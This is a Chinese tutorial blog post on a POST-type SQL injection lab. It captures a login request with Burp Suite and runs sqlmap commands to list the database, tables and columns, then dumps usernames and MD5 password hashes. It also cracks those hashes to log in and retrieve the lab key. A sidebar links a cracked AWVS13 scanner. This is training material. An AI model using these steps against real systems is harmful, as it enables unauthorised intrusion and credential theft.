专栏首页Web安全技术POST型SQL注入教学
原创

POST型SQL注入教学

这次教学要用到的工具有burpsuite,SQLMAP,浏览器

上次我给大家分享的AJE-Windows里面什么工具都有,可以直接装一个AJE-Windows工具不用一个一个的下,太麻烦

然后这次教学要用到的SQLMAP模块参数给大家说一下

--current-db //获取当前使用 的数据库

–tables 列出指定数据库中的表

--columns  //获取当前数据库中当前表的所有列名

--dump //获取当前数据库中当前表的所有用户名和密码

首先我们打开我们的AJE-Windows,再打开SQLMAP和burpsuite

靶场地址是http://219.153.49.228:45888

我们随便输入账号密码,然后打开burpsuite开启拦截包之后点登录,右键把拦截的数据包发送到repeater

右键文件复制到桌面

输入文件名然后点击保存

然后输入sqlmap.py -r 这里写刚刚保存的数据包(拖拽) --current-db回车

好的跑出来了,这个站常用的数据库名是mozhe_Discuz_StormGroup

然后接下来跑数据库表名sqlmap.py -r 抓包的文件 -D 该站点用的数据库名 --tables

跑出来的表名是StormGroup_member

接下来跑表内字段sqlmap.py -r 数据包文件 -D 数据库名 -T 表名 --columns

跑出来了表内字段name和password,这两个分别是用户名的列名和密码的列名

接下来跑用户名和密码sqlmap.py -r 数据包文件 -D 库名 -T 表名 -C name,password --dump

第一个用户名是mozhe第二个也是,第一个密码是356f589a7df439f6f744ff19bb8092c0第二个密码是

cac346c4e78571439ba96bc5a47c01b6,它用的是MD5加密,第一个解出来是dsan13

我们试试第一个能不能登上去

第一个登陆失败了试试第二个,第二个解出来密码是885288

我们登陆试试,登陆成功了,key是mozhe4953564e012470c2374e45919c2

提交key

好的,本次教学就到这里,喜欢我文章的欢迎点赞加关注,再订阅一下我的专栏,或者加入我专栏,有什么地方写的不好的欢迎加我QQ3516634930反馈

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • AWVS13破解安装与汉化

    链接:https://pan.baidu.com/s/1oF7-aOCympYES-4sRKJ4aw 提取码:yqvj 下载好之后解压缩包,打开acunetix...

    酷酷的繁星
  • GET型常见的注入点判断方法

    大家在对目标网站进行测试的时候如果挖到了SQL注入是不是要给厂商提供复现步骤和漏洞证明截图呢,提交复现步骤的时候我们只需要证明存在这个漏洞就可以过审,所以今天就...

    酷酷的繁星
  • 记一次SQL注入的漏洞复现

    至于我为什么没有继续下去,大家可以去读一下白帽子行为规范,漏洞复现只需要证明存在该漏洞就行了

    酷酷的繁星
  • 强化学习笔记9:探索和利用 exploration and exploitation

    最佳的策略是用长期的眼光来看,放弃短期高回报 获取足够策略是让策略变成全局最优的必要条件

    列夫托尔斯昊
  • 移动端诊断工具之抓包app

    其他移动端诊断工具可查看:https://cloud.tencent.com/developer/article/1489051

    邪恶の大灰
  • C语言之关键词记忆

    鲁郭大侠
  • Python写TCP端口扫描工具之IP协议的讲解

    專 欄 ❈exploit,Python中文社区专栏作者,入坑Python一年。希望与作者交流或者对文章有任何疑问的可以与作者联系: QQ:1585173691...

    Python中文社区
  • nagios/zabbix优缺点对比:

    zabbix比较大而全,已经把图标、数据库、分布式等等添加进系统,可以直接配置使用。

    it妹
  • SAP Spartacus的StorefrontConfig对象

    我们调用B2cStorefrontModule.withConfig方法时,需要传一个类型为StorefrontConfig的对象进去。

    Jerry Wang
  • rxjs里的Observable对象和map配合的一个用法

    新建一个Observable对象,将当前Observable对象传给source,operator.project即箭头函数:

    Jerry Wang

扫码关注云+社区

领取腾讯云代金券